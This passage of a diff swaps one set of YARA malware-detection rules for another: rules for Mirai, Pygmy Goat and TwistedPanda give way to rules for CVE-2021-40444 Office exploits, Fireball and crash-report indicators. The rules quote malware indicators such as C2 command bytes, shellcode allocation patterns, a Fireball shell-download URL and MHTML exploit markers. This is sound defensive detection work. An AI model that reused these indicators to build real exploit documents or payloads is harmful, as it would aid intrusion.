-               20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D
-               41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A }
+		$x1 = "msi.dll.eng" fullword wide
+		$s2 = "ahinovx" fullword ascii
+		$s3 = "jkpsxy47CDEMNSTYbhinqrwx56" fullword ascii
+		$s4 = "PVYdejmrsy12" fullword ascii
+		$s6 = "FLMTUZaijkpsxy45CD" fullword ascii
+		$s7 = "afhopqvw34ABIJOPTYZehmo" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 200KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 20KB and 3 of them )
 }
-rule SIGNATURE_BASE_MAL_Mirai_Nov19_1 : FILE
+rule SIGNATURE_BASE_Shellcrew_Streamex_1_Msi_Dll : FILE
 {
 	meta:
-		description = "Detects Mirai malware"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "40edcb29-9e10-5b87-ba79-8e3f629829e5"
-		date = "2019-11-13"
+		id = "56586e0b-010a-5ad5-8822-5d370475aa06"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/bad_packets/status/1194049104533282816"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mirai.yar#L140-L157"
+		reference = "https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_shellcrew_streamex.yar#L82-L98"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e1202a9cd445c590c359a9c93e635292f8cf7f09291f4d8504ad9ce6679f6a47"
+		logic_hash = "087ac07a2bf822f7838ef46296150381cfc9af9b12b4023654023a779efc1db1"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "bbb83da15d4dabd395996ed120435e276a6ddfbadafb9a7f096597c869c6c739"
-		hash2 = "fadbbe439f80cc33da0222f01973f27cce9f5ab0709f1bfbf1a954ceac5a579b"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "883108119d2f4db066fa82e37aa49ecd2dbdacda67eb936b96720663ed6565ce"
+		hash2 = "5311f862d7c824d13eea8293422211e94fb406d95af0ae51358accd4835aaef8"
+		hash3 = "191cbeffa36657ab1ef3939da023cacbc9de0285bbe7775069c3d6e18b372c3f"
 
 	strings:
-		$s1 = "SERVZUXO" fullword ascii
-		$s2 = "-loldongs" fullword ascii
-		$s3 = "/dev/null" fullword ascii
-		$s4 = "/bin/busybox" fullword ascii
-		$sc1 = { 47 72 6F 75 70 73 3A 09 30 }
+		$s1 = "NDOGDUA" fullword ascii
+		$s2 = "NsrdsrN" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize <= 100KB and 4 of them
+		( uint16( 0 ) == 0x4d9d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_MAL_ARM_LNX_Mirai_Mar13_2022 : FILE
+rule SIGNATURE_BASE_EXPL_CVE_2021_40444_Document_Rels_XML : CVE_2021_40444 FILE
 {
 	meta:
-		description = "Detects new ARM Mirai variant"
-		author = "Mehmet Ali Kerimoglu a.k.a. CYB3RMX"
-		id = "54d8860e-fc45-5571-b68c-66590c67a705"
-		date = "2022-03-16"
+		description = "Detects indicators found in weaponized documents that exploit CVE-2021-40444"
+		author = "Jeremy Brown / @alteredbytes"
+		id = "812bb68e-71ea-5a9a-8d39-ab99fdaa6c58"
+		date = "2021-09-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mirai.yar#L159-L181"
+		reference = "https://twitter.com/AlteredBytes/status/1435811407249952772"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cve_2021_40444.yar#L6-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a44a6174a198a658c8a5e2da50192da20bae7f8ed4e4f212c9eebb29fa4b0dd0"
+		logic_hash = "b05c3b33c3cab2c9109d808ed197758bc987f07beee77e1f61094715e0c1a1e7"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "0283b72913b8a78b2a594b2d40ebc3c873e4823299833a1ff6854421378f5a68"
+		tags = "CVE-2021-40444, FILE"
 
 	strings:
-		$str1 = "/home/landley/aboriginal/aboriginal/build/temp-armv6l/gcc-core/gcc/config/arm/lib1funcs.asm"
-		$str2 = "/home/landley/aboriginal/aboriginal/build/temp-armv6l/gcc-core/gcc/config/arm/lib1funcs.asm"
-		$str3 = "/home/landley/aboriginal/aboriginal/build/temp-armv6l/gcc-core/gcc/config/arm"
-		$str4 = "/home/landley/aboriginal/aboriginal/build/simple-cross-compiler-armv6l/bin/../cc/include"
-		$attck1 = "attack.c"
-		$attck2 = "attacks.c"
-		$attck3 = "anti_gdb_entry"
-		$attck4 = "resolve_cnc_addr"
-		$attck5 = "attack_gre_eth"
-		$attck6 = "attack_udp_generic"
-		$attck7 = "attack_get_opt_ip"
-		$attck8 = "attack_icmpecho"
+		$b1 = "/relationships/oleObject" ascii
+		$b2 = "/relationships/attachedTemplate" ascii
+		$c1 = "Target=\"mhtml:http" nocase
+		$c2 = "!x-usc:http" nocase
+		$c3 = "TargetMode=\"External\"" nocase
 
 	condition:
-		uint16( 0 ) == 0x457f and ( 3 of ( $str* ) or 4 of ( $attck* ) )
+		uint32( 0 ) == 0x6D783F3C and filesize < 10KB and 1 of ( $b* ) and all of ( $c* )
 }
-rule SIGNATURE_BASE_MAL_Sophos_XG_Pygmy_Goat_AES_Key : FILE
+rule SIGNATURE_BASE_EXPL_MAL_Maldoc_OBFUSCT_MHTML_Sep21_1 : CVE_2021_40444 FILE
 {
 	meta:
-		description = "Detects Pygmy Goat - a native x86-32 ELF shared object that was discovered on Sophos XG firewall devices, providing backdoor access to the device. This detection rule is based on the Pygmy Goat AES key built on the stack or in data"
-		author = "NCSC"
-		id = "62be3f4f-b435-54b2-b596-4ad01606edb8"
-		date = "2024-10-22"
-		modified = "2024-12-12"
-		reference = "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/pygmy-goat/ncsc-mar-pygmy-goat.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_sophos_pygmy_nov24.yar#L2-L24"
+		description = "Detects suspicious office reference files including an obfuscated MHTML reference exploiting CVE-2021-40444"
+		author = "Florian Roth (Nextron Systems)"
+		id = "781cfd61-d5ac-58e5-868f-dbd2a2df3500"
+		date = "2021-09-18"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/decalage2/status/1438946225190014984?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cve_2021_40444.yar#L27-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "da6c5d7a03eab01ddbb460cbdd16622839b3a52cfa4e91f169d3d477c60cfed4"
-		score = 75
-		quality = 69
-		tags = "FILE"
-		hash1 = "71f70d61af00542b2e9ad64abd2dda7e437536ff"
+		hash = "84674acffba5101c8ac518019a9afe2a78a675ef3525a44dceddeed8a0092c69"
+		logic_hash = "11a73572970d2d85d308330119a2c5243f2848ae78a861decdb0cdbde0d9d1c2"
+		score = 90
+		quality = 85
+		tags = "CVE-2021-40444, FILE"
 
 	strings:
-		$dword_1 = { 59 4b 6e 77 }
-		$dword_2 = { 51 6a 6d 41 }
-		$dword_3 = { 54 62 41 6e }
-		$dword_4 = { 52 6f 5a 6d }
-		$dword_5 = { 30 66 47 37 }
-		$dword_6 = { 55 5a 57 62 }
-		$dword_7 = { 32 59 55 78 }
-		$dword_8 = { 55 51 50 77 }
+		$h1 = "<?xml " ascii wide
+		$s1 = "109;&#104;&#116;&#109;&#108;&#58;&#104;&#116;&#109;&#108" ascii wide
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them and filesize < 4MB
+		filesize < 25KB and all of them
 }
-rule SIGNATURE_BASE_MAL_Sophos_XG_Pygmy_Goat_Magic_Strings : FILE
+rule SIGNATURE_BASE_EXPL_XML_Encoded_CVE_2021_40444 : CVE_2021_40444 FILE
 {
 	meta:
-		description = "Detects Pygmy Goat - a native x86-32 ELF shared object that was discovered on Sophos XG firewall devices, providing backdoor access to the device. This detection rule is based on the magic byte sequences used in C2 communications."
-		author = "NCSC"
-		id = "7df6c228-d569-5f1c-8bbb-4194347f99d1"
-		date = "2024-10-22"
-		modified = "2024-12-12"
-		reference = "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/pygmy-goat/ncsc-mar-pygmy-goat.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_sophos_pygmy_nov24.yar#L26-L44"
+		description = "Detects possible CVE-2021-40444 with no encoding, HTML/XML entity (and hex notation) encoding, or all 3"
+		author = "James E.C, Proofpoint"
+		id = "4bf9ec64-c662-5c8f-9e58-12a7412ef07d"
+		date = "2021-09-18"
+		modified = "2021-09-19"
+		reference = "https://twitter.com/sudosev/status/1439205606129377282"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cve_2021_40444.yar#L44-L61"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "df40e818002a72ee649dd2bb79cb59938dc108690cce03c99a72fc036406c4b2"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		hash1 = "71f70d61af00542b2e9ad64abd2dda7e437536ff"
+		hash = "13de9f39b1ad232e704b5e0b5051800fcd844e9f661185ace8287a23e9b3868e"
+		hash = "84674acffba5101c8ac518019a9afe2a78a675ef3525a44dceddeed8a0092c69"
+		logic_hash = "feaeadd8e7e262f191ea0c2f85377531208262e5ac19d6706703e62cf8b4ec90"
+		score = 70
+		quality = 60
+		tags = "CVE-2021-40444, FILE"
 
 	strings:
-		$c2_magic_handshake = ",bEB3?=o"
-		$fake_ssh_banner = "SSH-2.0-D8pjE"
-		$fake_ed25519_key = { 29 cc f0 cc 16 c5 46 6e 52 19 82 8e 86
-      65 42 8c 1f 1a d4 c3 a5 b1 cb fc c0 26 6c 31 3c 5c 90 3a 24 7d e4 d3 57
-      6d da 8e cb f4 66 d1 cb 81 4f 63 fd 4a fa 06 e4 7e 4c a0 95 91 bd cb 97
-      a4 b3 0f }
+		$h1 = "<?xml " ascii wide
+		$t_xml_r = /Target[\s]{0,20}=[\s]{0,20}\["']([Mm]|&#(109|77|x6d|x4d);)([Hh]|&#(104|72|x68|x48);)([Tt]|&#(116|84|x74|x54);)([Mm]|&#(109|77|x6d|x4d);)([Ll]|&#(108|76|x6c|x4c);)(:|&#58;|&#x3a)/
+		$t_mode_r = /TargetMode[\s]{0,20}=[\s]{0,20}\["']([Ee]|&#(x45|x65|69|101);)([Xx]|&#(x58|x78|88|120);)([Tt]|&#(x74|x54|84|116);)/
 
 	condition:
-		uint32( 0 ) == 0x464c457f and any of them
+		filesize < 500KB and $h1 and all of ( $t_* )
 }
-rule SIGNATURE_BASE_MAL_Earthworm_Socks_Proxy_ID_Generation : FILE
+rule SIGNATURE_BASE_SUSP_OBFUSC_Indiators_XML_Officedoc_Sep21_1 : WINDOWS CVE FILE
 {
 	meta:
-		description = "Detects EarthWorm - a reverse socks proxy used by the threat group that deployed Pygmy Goat malware on Sophos XG firewall devices. The detection is based on the pool num generation x86 assembly."
-		author = "NCSC"
-		id = "242777e4-3abb-50d8-8c45-746cc4a8b1f8"
-		date = "2024-10-22"
-		modified = "2024-12-12"
-		reference = "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/pygmy-goat/ncsc-mar-pygmy-goat.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_sophos_pygmy_nov24.yar#L46-L71"
+		description = "Detects suspicious encodings in fields used in reference files found in weaponized MS Office documents"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ffcaf270-f574-5692-90e5-6776c34eb71b"
+		date = "2021-09-18"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/sudosev/status/1439205606129377282"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cve_2021_40444.yar#L64-L81"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6837cba2637ed02d1d620c037b200d528c09a39498c1e320873a3a244e67932c"
-		score = 75
+		hash = "13de9f39b1ad232e704b5e0b5051800fcd844e9f661185ace8287a23e9b3868e"
+		hash = "84674acffba5101c8ac518019a9afe2a78a675ef3525a44dceddeed8a0092c69"
+		logic_hash = "fc8f0dd02460ab8f8cc6717c66eba51e6ed74881a48e92fd0bf978467dfb40e3"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		hash1 = "71f70d61af00542b2e9ad64abd2dda7e437536ff"
+		tags = "WINDOWS, CVE, FILE"
 
 	strings:
-		$chartoi = {
-         8b 45 ?? // MOV EAX,dword ptr [EBP + ??]
-         c1 e0 07 // SHL EAX,0x7
-         89 c1 // MOV ECX,EAX
-         8b 55 ?? // MOV EDX,dword ptr [EBP + ??]
-         8b 45 ?? // MOV EAX,dword ptr [EBP + ??]
-         01 d0 // ADD EAX,EDX
-         0f b6 00 // MOVZX EAX,byte ptr [EAX]
-         0f be c0 // MOVSX EAX,AL
-         01 c8 // ADD EAX,ECX
-         89 45 ?? // MOV dword ptr [EBP + ??],EAX
-         83 6d ?? 01 // SUB dword ptr [EBP + ??],0x1
-      }
+		$h1 = "<?xml " ascii wide
+		$xml_e = "Target=\"&#" ascii wide
+		$xml_mode_1 = "TargetMode=\"&#" ascii wide
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		filesize < 500KB and $h1 and 1 of ( $xml* )
 }
-rule SIGNATURE_BASE_APT_CN_Twistedpanda_Loader : FILE
+rule SIGNATURE_BASE_SUSP_OBFUSC_Indiators_XML_Officedoc_Sep21_2 : WINDOWS CVE FILE
 {
 	meta:
-		description = "Detects loader used by TwistedPanda"
-		author = "Check Point Research"
-		id = "a10f6019-f069-579c-b112-18537a7d8fd8"
-		date = "2022-04-14"
+		description = "Detects suspicious encodings in fields used in reference files found in weaponized MS Office documents"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c3c5ec4f-5d2a-523c-bd4b-b75c04bac87d"
+		date = "2021-09-18"
 		modified = "2023-12-05"
-		reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_twisted_panda.yar#L1-L44"
+		reference = "https://twitter.com/sudosev/status/1439205606129377282"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cve_2021_40444.yar#L83-L98"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b6b3892432be4bd8dfd44f08c124865c54d5ad2dc90b630072f19f7144d33555"
-		score = 80
+		logic_hash = "82c70e0f0b72a57302e5853cc53ae18dbb0bc8dabdfd27b473a7664b2fc5e874"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		hash1 = "5b558c5fcbed8544cb100bd3db3c04a70dca02eec6fedffd5e3dcecb0b04fba0"
-		hash2 = "efa754450f199caae204ca387976e197d95cdc7e83641444c1a5a91b58ba6198"
+		tags = "WINDOWS, CVE, FILE"
 
 	strings:
-		$seq1 = { 6A 40 68 00 30 00 00 }
-		$seq2 = { 6A 00 50 6A 14 8D ?? ?? ?? ?? ?? 50 53 FF }
-		$seq3 = { 6A 00 6A 00 6A 03 6A 00 6A 03 68 00 00 00 80 }
-		$decryption = { 8B C? [2-3] F6 D? 1A C? [2-3] [2-3] 30 0? ?? 4? }
+		$h1 = "<?xml " ascii wide
+		$a1 = "Target" ascii wide
+		$a2 = "TargetMode" ascii wide
+		$xml_e = "&#x0000" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 3000KB and all of ( $seq* ) and $decryption
+		filesize < 500KB and all of them
 }
-rule SIGNATURE_BASE_APT_CN_Twistedpanda_SPINNER_1 : FILE
+rule SIGNATURE_BASE_SUSP_WER_Critical_Heapcorruption : FILE
 {
 	meta:
-		description = "Detects the obfuscated variant of SPINNER payload used by TwistedPanda"
-		author = "Check Point Research"
-		id = "0b44013d-0caa-5ea2-ab08-e2a6a5732c03"
-		date = "2022-04-14"
+		description = "Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2b1dad5f-cc2c-5d8c-8275-ebb56d079895"
+		date = "2019-10-18"
 		modified = "2023-12-05"
-		reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_twisted_panda.yar#L46-L80"
+		reference = "https://twitter.com/cyb3rops/status/1185459425710092288"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_wer_files.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e7abe4b3f4225596131882a9175f9ac2e45ba00557950772a8e4d1eaeab97d05"
-		score = 80
+		logic_hash = "efa84e375f31ca37b9dd9c7a74251929ac957b9bd530e92f74b8836f56048fea"
+		score = 45
 		quality = 85
 		tags = "FILE"
-		hash1 = "a9fb7bb40de8508606a318866e0e5ff79b98f314e782f26c7044622939dfde81"
 
 	strings:
-		$config_init = { C7 ?? ?? ?? 00 00 00 C7 ?? ?? ?? 00 00 00 C6 }
-		$c2_cmd_1 = { 01 00 03 10}
-		$c2_cmd_2 = { 02 00 01 10}
-		$c2_cmd_3 = { 01 00 01 10}
-		$decryption = { 8D 83 [4] 80 B3 [5] 89 F1 6A 01 50 E8 [4] 80 B3 }
+		$a1 = "ReportIdentifier=" wide
+		$a2 = ".Name=Fault Module Name" wide
+		$s1 = "c0000374" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 3000KB and #config_init > 10 and 2 of ( $c2_cmd_* ) and $decryption
+		( uint32be( 0 ) == 0x56006500 or uint32be( 0 ) == 0xfffe5600 ) and all of them
 }
-rule SIGNATURE_BASE_APT_CN_Twistedpanda_SPINNER_2 : FILE
+rule SIGNATURE_BASE_SUSP_WER_Suspicious_Crash_Directory : FILE
 {
 	meta:
-		description = "Detects an older variant of SPINNER payload used by TwistedPanda"
-		author = "Check Point Research"
-		id = "bbbf3af1-127f-5d32-967f-bdb94311d1d6"
-		date = "2022-04-14"
+		description = "Detects a crashed application executed in a suspicious directory"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bf91e20c-aa35-5b13-86ed-a63e6fb4d1a2"
+		date = "2019-10-18"
 		modified = "2023-12-05"
-		reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_twisted_panda.yar#L82-L118"
+		reference = "https://twitter.com/cyb3rops/status/1185585050059976705"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_wer_files.yar#L20-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d1e34903e58fb76671a076acbb9f26e10d511c8f00be90b4901d61b73b90a9a7"
-		score = 80
-		quality = 85
+		logic_hash = "a197feeafca38ffe33428fa807e2b80e3071ab8960926fc2f328748bda299910"
+		score = 45
+		quality = 60
 		tags = "FILE"
-		hash1 = "28ecd1127bac08759d018787484b1bd16213809a2cc414514dc1ea87eb4c5ab8"
 
 	strings:
-		$config_init = { C7 [3] 00 00 00 C7 [3] 00 00 00 C6 }
-		$c2_cmd_1 = { 01 00 03 10 }
-		$c2_cmd_2 = { 02 00 01 10 }
-		$c2_cmd_3 = { 01 00 01 10 }
-		$c2_cmd_4 = { 01 00 00 10 }
-		$c2_cmd_5 = { 02 00 00 10 }
-		$decryption = { 80 B3 [5] 8D BB [4] 8B 56 14 8B C2 8B 4E 10 2B C1 83 F8 01 }
+		$a1 = "ReportIdentifier=" wide
+		$a2 = ".Name=Fault Module Name" wide
+		$a3 = "AppPath=" wide nocase
+		$l1 = "AppPath=C:\\Windows\\" wide nocase
+		$l2 = "AppPath=C:\\Program" wide nocase
+		$l3 = "AppPath=C:\\Python" wide nocase
+		$l4 = "AppPath=C:\\Users\\" wide nocase
+		$s6 = "AppPath=C:\\Users\\Public\\" nocase wide
+		$s7 = "AppPath=C:\\Users\\Default\\" nocase wide
+		$s8 = /AppPath=C:\\Users\\[^\\]{1,64}\\AppData\\(Local|Roaming)\\[^\\]{1,64}\.exe/ wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 3000KB and #config_init > 10 and 2 of ( $c2_cmd_* ) and $decryption
+		( uint32be( 0 ) == 0x56006500 or uint32be( 0 ) == 0xfffe5600 ) and all of ( $a* ) and ( not 1 of ( $l* ) or 1 of ( $s* ) )
 }
-rule SIGNATURE_BASE_APT_CN_Twistedpanda_64Bit_Loader : FILE
+rule SIGNATURE_BASE_Fireball_De_Svr : FILE
 {
 	meta:
-		description = "Detects the 64bit Loader DLL used by TwistedPanda"
-		author = "Check Point Research"
-		id = "2172dd33-204b-5a05-ad26-534a0c1d7a17"
-		date = "2022-04-14"
+		description = "Detects Fireball malware - file de_svr.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "29395239-66d8-5340-b884-9b8f036cc27f"
+		date = "2017-06-02"
 		modified = "2023-12-05"
-		reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_twisted_panda.yar#L120-L155"
+		reference = "https://goo.gl/4pTkGQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_fireball.yar#L12-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "644547f9fa6ca3f34ea32e06896f341e0c92f5c57dee3c478aed0cdf87b2f3de"
-		score = 80
+		logic_hash = "9ac858b3ce50daac811ded4664f2a602a32d8811825733d235125fc81a488e58"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "e0d4ef7190ff50e6ad2a2403c87cc37254498e8cc5a3b2b8798983b1b3cdc94f"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f964a4b95d5c518fd56f06044af39a146d84b801d9472e022de4c929a5b8fdcc"
 
 	strings:
-		$path_check = { 48 8D [6] 48 8B ?? 48 81 [5] 72 }
-		$shellcode_read = { 48 8B D0 41 B8 F0 16 00 00 48 8B CF 48 8B D8 FF}
-		$shellcode_allocate = { BA F0 16 00 00 44 8D 4E 40 33 C9 41 B8 00 30 00 00 FF }
+		$s1 = "cmd.exe /c MD " fullword ascii
+		$s2 = "rundll32.exe \"%s\",%s" fullword wide
+		$s3 = "http://d12zpbetgs1pco.cloudfront.net/Weatherapi/shell" fullword wide
+		$s4 = "C:\\v3\\exe\\de_svr_inst.pdb" fullword ascii
+		$s5 = "Internet Connect Failed!" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 3000KB and $path_check and $shellcode_allocate and $shellcode_read
+		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and 4 of them )
 }
-rule SIGNATURE_BASE_APT_CN_Twistedpanda_Droppers : FILE
+rule SIGNATURE_BASE_Fireball_Lancer : FILE
 {
 	meta:
-		description = "Detects droppers used by TwistedPanda"
-		author = "Check Point Research"
-		id = "f61c8b97-5870-5837-942f-f1650870960a"
-		date = "2022-04-14"
+		description = "Detects Fireball malware - file lancer.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2209bcb4-74a6-5c39-962c-ccd4ce62619e"
+		date = "2017-06-02"
 		modified = "2023-12-05"
-		reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_twisted_panda.yar#L157-L194"
+		reference = "https://goo.gl/4pTkGQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_fireball.yar#L31-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "820b4796511dcf98cdc8017a39cc2c65e44d8d9a20f55803aa1ddd36f649c83a"
-		score = 80
+		logic_hash = "74df144556121609da0820c319a86a9de0f49eeb2d4b1ed59c3a4d0c1d7788cb"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "59dea38da6e515af45d6df68f8959601e2bbf0302e35b7989e741e9aba2f0291"
-		hash2 = "8b04479fdf22892cdfebd6e6fbed180701e036806ed0ddbe79f0b29f73449248"
-		hash3 = "f29a0cda6e56fc0e26efa3b6628c6bcaa0819a3275a10e9da2a8517778152d66"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7d68386554e514f38f98f24e8056c11c0a227602ed179d54ed08f2251dc9ea93"
 
 	strings:
-		$switch_control = { 81 FA [4] 75 ?? E8 [4] 48 89 05 [4] E? }
-		$byte_manipulation = { 41 0F [2] 44 [2] 41 [2] 03 41 81 [5] 41 }
-		$stack_strings_1 = { 25 00 70 00 }
-		$stack_strings_2 = { 75 00 62 00 }
-		$stack_strings_3 = { 6C 00 69 00 }
-		$stack_strings_4 = { 63 00 25 00 }
+		$x1 = "\\instlsp\\Release\\Lancer.pdb" ascii
+		$x2 = "lanceruse.dat" fullword wide
+		$s1 = "Lancer.dll" fullword ascii
+		$s2 = "RunDll32.exe \"" fullword wide
+		$s3 = "Micr.dll" fullword wide
+		$s4 = "AG64.dll" fullword wide
+		$s5 = "\",Start" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 3000KB and #switch_control > 8 and all of ( $stack_strings_* ) and $byte_manipulation
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( 6 of them )
 }
-rule SIGNATURE_BASE_Rocketkitten_Keylogger : FILE
+rule SIGNATURE_BASE_Qqbrowser : FILE
 {
 	meta:
-		description = "Detects Keylogger used in Rocket Kitten APT"
+		description = "Not malware but suspicious browser - file QQBrowser.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "558341db-a30d-586e-8efc-0fff1d8f94a1"
-		date = "2015-09-01"
+		id = "457507c5-0411-5d72-891b-ae3e428ea2d6"
+		date = "2017-06-02"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/SjQhlp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rocketkitten_keylogger.yar#L8-L35"
+		reference = "https://goo.gl/4pTkGQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_fireball.yar#L53-L70"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c8523a50075c6ee9675d37d870da55d9e6193bbc770f6b916e700ab9aad438cc"
-		score = 75
-		quality = 85
+		logic_hash = "525d134f57aaa314bcf0676678264e518edb785970478cb31a8fb6f1c8c92263"
+		score = 50
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "1c9e519dca0468a87322bebe2a06741136de7969a4eb3efda0ab8db83f0807b4"
-		hash2 = "495a15f9f30d6f6096a97c2bd8cc5edd4d78569b8d541b1d5a64169f8109bc5b"
+		hash1 = "adcf6b8aa633286cd3a2ce7c79befab207802dec0e705ed3c74c043dabfc604c"
 
 	strings:
-		$x1 = "\\Release\\CWoolger.pdb" ascii
-		$x2 = "WoolenLoger\\obj\\x86\\Release" ascii
-		$x3 = "D:\\Yaser Logers\\"
-		$z1 = "woolger" fullword wide
-		$s1 = "oShellLink.TargetPath = \"" fullword ascii
-		$s2 = "wscript.exe " fullword ascii
